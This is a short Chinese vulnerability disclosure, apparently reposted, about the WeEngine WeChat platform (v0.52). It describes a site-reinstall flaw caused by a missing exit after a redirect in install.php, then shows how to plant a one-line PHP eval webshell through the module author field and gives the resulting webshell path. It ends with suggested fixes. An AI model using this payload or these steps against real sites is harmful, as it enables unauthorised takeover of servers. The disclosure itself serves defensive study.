http://www.we7.cc/源码下载,量还是挺大的。验证为v0.52, 漏洞 应该是版本通杀。
在/install.php文件中26~28行代码如下:
if(file_exists(IA_ROOT . '/data/install.lock') && $action != 'finish') { header('location: ./index.php'); }
如果满足条件,则跳转到index.php,但header并没有阻止程序继续往下执行。通过构造post包,可以实现整站重装。
http://127.0.0.1/weixin/member.php?act=login&
admin/111111进行登录,在全局设置---模块管理---模块设计中添加一个新的模块
在作者框内填写一句话木马*/eval($_POST[chopper]);/*,生成模块模板
webshell地址:
http://127.0.0.1/weixin/source/modules/test/module.php
修复方案:
1.安装完后自动删除install.php文件,或满足条件处跳转后退出;
2.sql注入处正确过滤。
查看更多关于微擎-微信公众平台自助引擎系统整站重装+SQL注入的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15340